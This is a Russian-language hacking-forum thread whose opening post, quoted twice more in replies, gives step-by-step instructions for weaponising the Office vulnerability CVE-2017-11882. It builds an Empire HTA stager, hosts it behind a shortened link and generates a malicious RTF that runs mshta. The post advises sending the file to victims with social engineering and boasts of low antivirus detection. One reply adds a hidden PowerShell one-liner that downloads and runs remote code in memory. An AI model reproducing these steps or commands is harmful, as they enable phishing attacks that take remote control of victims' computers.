Статья CVE-2017-11882 или Взлом с помощью безобидного документа

Всем привет. Сегодня хочу показать Вам новый эксплоит, с помощью которого мы получим доступ к целевой машине.

Коротко и по делу:

Создаем файл в формате RTF с вызовом функции командной строки mshta , которая позволит вызвать powershell с помощью HTA файла, расположенного на удаленном сервере.

Поехали!

Источник : https://github.com/Ridter/CVE-2017-11882

Установка :

Код:
git clone https://github.com/Ridter/CVE-2017-11882
cd CVE-2017-11882
chmod +x Command109b_CVE-2017-11882.py
chmod +x Command43b_CVE-2017-11882.py
На этом все.

Теперь создадим HTA файл с помощью [Empire] Post-Exploitation Framework

Источник : https://github.com/EmpireProject/Empire

Гайд по использованию Empire от DarkNode: https://codeby.net/threads/znakomstvo-s-powershell-empire-framework.58469/
Гайд по HTA что такое и с чем едят : https://codeby.net/threads/malvar-na-html-ili-hta-dlja-xakera.61136/

Собственно говоря, поехали :

Listeners у меня уже есть, что бы их создать, проделаем :
listeners
uselistener http

Далее заполняем нужные поля с помощью set
Пример : set Name http - задать имя листенера http
set Host ip - пишем айпишник куда стучаться вистиму
set Port номер порта - пишем на какой порт стукать
execute - выполнить, создать

Далее у вас появится листенер. Можно вернутся в главное меню с помощью : main

upload_2017-11-22_22-14-40.png


Создание HTA

upload_2017-11-22_21-32-7.png


usestager windows/hta - использовать модуль
info - посмотреть инфу и обычно заполнить Listener
set Listener http (у меня так называется листенер "http")
set OutFile /tmp/hack1.hta - путь к сохранению файла и название
execute - генерим и получаем на выходе

upload_2017-11-22_21-35-44.png


Далее идем в папочку /tmp берем этот файлик и заливаем на любой файлообменник. К примеру Google Drive.

upload_2017-11-22_21-39-56.png


Далее включаем доступ на скачивание всем у кого есть ссылка. Копируем ссылку и переходим по ней :

upload_2017-11-22_21-41-18.png


upload_2017-11-22_21-44-23.png


Здесь копируем ссылку на скачивание файла и идем к любому сервису по сокращению ссылок. Я предпочел гугловский:

upload_2017-11-22_21-46-21.png


Копируем это батву, идем в каталог где мы установили софт. У меня это :
Код:
cd CVE-2017-11882
Здесь исполняем следующее :
Код:
python Command109b_CVE-2017-11882.py -c "mshta сюда вставить сокращенную ссылку" -o codeby.rtf
upload_2017-11-22_21-50-10.png


Файл создан в формате rft. Почему так, объясню в конце статьи. Далее отправляем потенциальному клиенту.. ) Уж тут кто что придумает, в помощь СИ) И после запуска файла видим следующую картину )

upload_2017-11-22_21-54-48.png


YEAAH! PROF1t! Теперь на машине, которая запустила файл в процессах появится наш родимый и неповторимый PowerShell, а значит Мы в системе, тому свидетельствуем подключение агента в империи ) Далее делаем чего душе угодно. В Империи куча фичей прикольных, в том числе и трольских)

Дополнительная информация : Почему RTF? Почему не DOC? Дело в том, что я часа 2 убил на то, что бы тестировать файлы док. Тестируемая машина вин 10 с 16тым офисом, запускал и ничего не происходило. Долго не мог понять что такое, да и забил. Создал в ртф и просто супер. Никаких проблем. Запускается файл, далее вылазит обычное окошко " разрешить редактирование файла " это никакое не предупреждение безопасности как в макросах, это банальщина и ничего в себе таинственного она не несет. После разрешения редактирования мигает окошко ПоверШелл и все, система завоевана.

Как обстоят дела с обнаружением ? Тут дело такое, первый раз когда создал, видел только Касперыч. Буквально через несколько часов еще парочка. И того 3, из них самый распространенный Касперский.

Результат на nodistribute:

По мне так очень даже хорошие показатели. Способ довольно простой, не требует особых хацких навыков. Статью пишу первый раз, не судите строго =) Всем профит!
 

Вложения

  • upload_2017-11-22_21-31-29.png
    upload_2017-11-22_21-31-29.png
    18,7 КБ · Просмотры: 2 407
O

OneDollar

Всем привет,
Возможно, мой вопрос покажется немного необдуманным, но все же прошу Вашей помощи!
Почему то не определяет агента, на принимающей машине загружается скрипт, в процессах есть powerShell, а на хосте нет агента?
Инструкция написана для локальной сети, а как быть с внешней? Для меня, как хоста, нужен статический ip, верно?
Спасибо огромное
В параметре LHOST укажи внешний айпи (который на 2ip показывает) или используй noip сервис, если IP меняется постоянно..
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
А на маке это будет работать?

Берем название уязвимости CVE-2017-11882 идем в поиск и смотрим описание из которого видно: уязвимость для MS Office + Win ( уязвимость была актуальна 17 лет )
 
  • Нравится
Реакции: Tihon49 и OneDollar
T

TST

Берем название уязвимости CVE-2017-11882 идем в поиск и смотрим описание из которого видно: уязвимость для MS Office + Win ( уязвимость была актуальна 17 лет )
Кто подскажет как в одну строку залить шелл чтобы обратную связь получить?
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc , вот где -c вставить код и удаленно запустить?
 
T

tumm

Беда. Причем тут регалии и прочее? Глупые люди думают, что я спорю потому что чувствую силу, что я модератор. На самом деле я никак не оперировал своим статусом на этом форуме. Я в шоке от непонимания что такое эксплоит, а что такое нагрузка. В чем разница между шеллкодом и эксплоитом?! Очень рекомендую книгу "Хакинг: Искусство сплоитинга" - в идеале читать в оригинале, чтобы потом не бегать по форумам и не учить людей в чем не разбираешься.

Чтобы знать разницу между эксплойтом и нагрузкой необязательно читать тонны книг. Невижу смысла далее спорить с человеком который некомпетентен в этом вопросе.
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Кто подскажет как в одну строку залить шелл чтобы обратную связь получить?
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc , вот где -c вставить код и удаленно запустить?

Вы самый первый пост внимательно читали?
 
  • Нравится
Реакции: OneDollar
L

llein

Копался в PowerShell и столкнулся с проблемой, связанной с данным сплоитом при использовании powershell вместо mshta. Возможно ли через него скачать с обменника и запустить файл? Если да, то как это реализуется? Пытался через wget по сокращенной ссылке, но не сработало((
 
O

OneDollar

Копался в PowerShell и столкнулся с проблемой, связанной с данным сплоитом при использовании powershell вместо mshta. Возможно ли через него скачать с обменника и запустить файл? Если да, то как это реализуется? Пытался через wget по сокращенной ссылке, но не сработало((
powershell.exe -nop -w hidden IEX (New-Object Net.WebClient).downloadstring('

-w hidden (window hidden ) -- скрыть окно запуска
-NoP (No Profile) -- не использовать профиль PowerShell

IEX (New-Object Net.WebClient).downloadstring(' -- загрузить и запустить в памяти контент который находится по ссылку

А вообще читай тык и тык
 
  • Нравится
Реакции: Vertigo
X

xfiver

возможно я тупой, но где скачать listeners?
 
S

sem3n

Всем привет. Сегодня хочу показать Вам новый эксплоит, с помощью которого мы получим доступ к целевой машине.

Коротко и по делу:

Создаем файл в формате RTF с вызовом функции командной строки mshta , которая позволит вызвать powershell с помощью HTA файла, расположенного на удаленном сервере.

Поехали!

Источник : Ridter/CVE-2017-11882

Установка :
Код:
git clone https://github.com/Ridter/CVE-2017-11882
cd CVE-2017-11882
chmod +x Command109b_CVE-2017-11882.py
chmod +x Command43b_CVE-2017-11882.py
На этом все.

Теперь создадим HTA файл с помощью [Empire] Post-Exploitation Framework

Источник : EmpireProject/Empire

Гайд по использованию Empire от DarkNode: Знакомство с PowerShell Empire Framework
Гайд по HTA что такое и с чем едят : Малварь на HTML или HTA для хакера.

Собственно говоря, поехали :

Listeners у меня уже есть, что бы их создать, проделаем :
listeners
uselistener http

Далее заполняем нужные поля с помощью set
Пример : set Name http - задать имя листенера http
set Host ip - пишем айпишник куда стучаться вистиму
set Port номер порта - пишем на какой порт стукать
execute - выполнить, создать

Далее у вас появится листенер. Можно вернутся в главное меню с помощью : main

Посмотреть вложение 13156

Создание HTA

Посмотреть вложение 13145

usestager windows/hta - использовать модуль
info - посмотреть инфу и обычно заполнить Listener
set Listener http (у меня так называется листенер "http")
set OutFile /tmp/hack1.hta - путь к сохранению файла и название
execute - генерим и получаем на выходе

Посмотреть вложение 13146

Далее идем в папочку /tmp берем этот файлик и заливаем на любой файлообменник. К примеру Google Drive.

Посмотреть вложение 13147

Далее включаем доступ на скачивание всем у кого есть ссылка. Копируем ссылку и переходим по ней :

Посмотреть вложение 13148

Посмотреть вложение 13150

Здесь копируем ссылку на скачивание файла и идем к любому сервису по сокращению ссылок. Я предпочел гугловский:

Посмотреть вложение 13151

Копируем это батву, идем в каталог где мы установили софт. У меня это :
Код:
cd CVE-2017-11882
Здесь исполняем следующее :
Код:
python Command109b_CVE-2017-11882.py -c "mshta сюда вставить сокращенную ссылку" -o codeby.rtf
Посмотреть вложение 13152

Файл создан в формате rft. Почему так, объясню в конце статьи. Далее отправляем потенциальному клиенту.. ) Уж тут кто что придумает, в помощь СИ) И после запуска файла видим следующую картину )

Посмотреть вложение 13155

YEAAH! PROF1t! Теперь на машине, которая запустила файл в процессах появится наш родимый и неповторимый PowerShell, а значит Мы в системе, тому свидетельствуем подключение агента в империи ) Далее делаем чего душе угодно. В Империи куча фичей прикольных, в том числе и трольских)

Дополнительная информация : Почему RTF? Почему не DOC? Дело в том, что я часа 2 убил на то, что бы тестировать файлы док. Тестируемая машина вин 10 с 16тым офисом, запускал и ничего не происходило. Долго не мог понять что такое, да и забил. Создал в ртф и просто супер. Никаких проблем. Запускается файл, далее вылазит обычное окошко " разрешить редактирование файла " это никакое не предупреждение безопасности как в макросах, это банальщина и ничего в себе таинственного она не несет. После разрешения редактирования мигает окошко ПоверШелл и все, система завоевана.

Как обстоят дела с обнаружением ? Тут дело такое, первый раз когда создал, видел только Касперыч. Буквально через несколько часов еще парочка. И того 3, из них самый распространенный Касперский.

Результат на nodistribute:

По мне так очень даже хорошие показатели. Способ довольно простой, не требует особых хацких навыков. Статью пишу первый раз, не судите строго =) Всем профит!
Добрый день, подскажите почему у меня при запуске файла не открывается PowerShell, тем самым в агентах тоже ничего нет (kali на виртуальной машине. Файл зпускал с основной винды)
 

EnderGamer

New member
02.11.2022
1
0
BIT
0
Всем привет. Сегодня хочу показать Вам новый эксплоит, с помощью которого мы получим доступ к целевой машине.

Коротко и по делу:

Создаем файл в формате RTF с вызовом функции командной строки mshta , которая позволит вызвать powershell с помощью HTA файла, расположенного на удаленном сервере.

Поехали!

Источник : GitHub - Ridter/CVE-2017-11882: CVE-2017-11882 from https://github.com/embedi/CVE-2017-11882

Установка :
Код:
git clone https://github.com/Ridter/CVE-2017-11882
cd CVE-2017-11882
chmod +x Command109b_CVE-2017-11882.py
chmod +x Command43b_CVE-2017-11882.py
На этом все.

Теперь создадим HTA файл с помощью [Empire] Post-Exploitation Framework

Источник : GitHub - EmpireProject/Empire: Empire is a PowerShell and Python post-exploitation agent.

Гайд по использованию Empire от DarkNode: Статья - Знакомство с PowerShell Empire Framework
Гайд по HTA что такое и с чем едят : Статья - Малварь на HTML или HTA для хакера

Собственно говоря, поехали :

Listeners у меня уже есть, что бы их создать, проделаем :
listeners
uselistener http

Далее заполняем нужные поля с помощью set
Пример : set Name http - задать имя листенера http
set Host ip - пишем айпишник куда стучаться вистиму
set Port номер порта - пишем на какой порт стукать
execute - выполнить, создать

Далее у вас появится листенер. Можно вернутся в главное меню с помощью : main

Посмотреть вложение 13156

Создание HTA

Посмотреть вложение 13145

usestager windows/hta - использовать модуль
info - посмотреть инфу и обычно заполнить Listener
set Listener http (у меня так называется листенер "http")
set OutFile /tmp/hack1.hta - путь к сохранению файла и название
execute - генерим и получаем на выходе

Посмотреть вложение 13146

Далее идем в папочку /tmp берем этот файлик и заливаем на любой файлообменник. К примеру Google Drive.

Посмотреть вложение 13147

Далее включаем доступ на скачивание всем у кого есть ссылка. Копируем ссылку и переходим по ней :

Посмотреть вложение 13148

Посмотреть вложение 13150

Здесь копируем ссылку на скачивание файла и идем к любому сервису по сокращению ссылок. Я предпочел гугловский:

Посмотреть вложение 13151

Копируем это батву, идем в каталог где мы установили софт. У меня это :
Код:
cd CVE-2017-11882
Здесь исполняем следующее :
Код:
python Command109b_CVE-2017-11882.py -c "mshta сюда вставить сокращенную ссылку" -o codeby.rtf
Посмотреть вложение 13152

Файл создан в формате rft. Почему так, объясню в конце статьи. Далее отправляем потенциальному клиенту.. ) Уж тут кто что придумает, в помощь СИ) И после запуска файла видим следующую картину )

Посмотреть вложение 13155

YEAAH! PROF1t! Теперь на машине, которая запустила файл в процессах появится наш родимый и неповторимый PowerShell, а значит Мы в системе, тому свидетельствуем подключение агента в империи ) Далее делаем чего душе угодно. В Империи куча фичей прикольных, в том числе и трольских)

Дополнительная информация : Почему RTF? Почему не DOC? Дело в том, что я часа 2 убил на то, что бы тестировать файлы док. Тестируемая машина вин 10 с 16тым офисом, запускал и ничего не происходило. Долго не мог понять что такое, да и забил. Создал в ртф и просто супер. Никаких проблем. Запускается файл, далее вылазит обычное окошко " разрешить редактирование файла " это никакое не предупреждение безопасности как в макросах, это банальщина и ничего в себе таинственного она не несет. После разрешения редактирования мигает окошко ПоверШелл и все, система завоевана.

Как обстоят дела с обнаружением ? Тут дело такое, первый раз когда создал, видел только Касперыч. Буквально через несколько часов еще парочка. И того 3, из них самый распространенный Касперский.

Результат на nodistribute:

По мне так очень даже хорошие показатели. Способ довольно простой, не требует особых хацких навыков. Статью пишу первый раз, не судите строго =) Всем профит
Скажите пожалуйста какой скрипт надо куда вставить чтобы при открытии rtf файла скачалась вот это
 

Pool-Geeme Lazyy

New member
20.01.2023
1
0
BIT
0
Что делать если при создании rtf файла вылазит ошибка line 51 print "[1] Primitive commandmust beshorter then 109 bytes"
И потом пишет может вы хотели бы добавить скобочки, добавил везде скобки , создаю файл и опять вылазит ошибка , но другая
фото прикрепил, помогите пожалуйста.
ошибка.png
 

Exited3n

Red Team
10.05.2022
760
259
BIT
770
Что делать если при создании rtf файла вылазит ошибка line 51 print "[1] Primitive commandmust beshorter then 109 bytes"
И потом пишет может вы хотели бы добавить скобочки, добавил везде скобки , создаю файл и опять вылазит ошибка , но другая
фото прикрепил, помогите пожалуйста.
Посмотреть вложение 66025
Ты юзаешь python 3...
 
  • Нравится
Реакции: GoBL1n
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!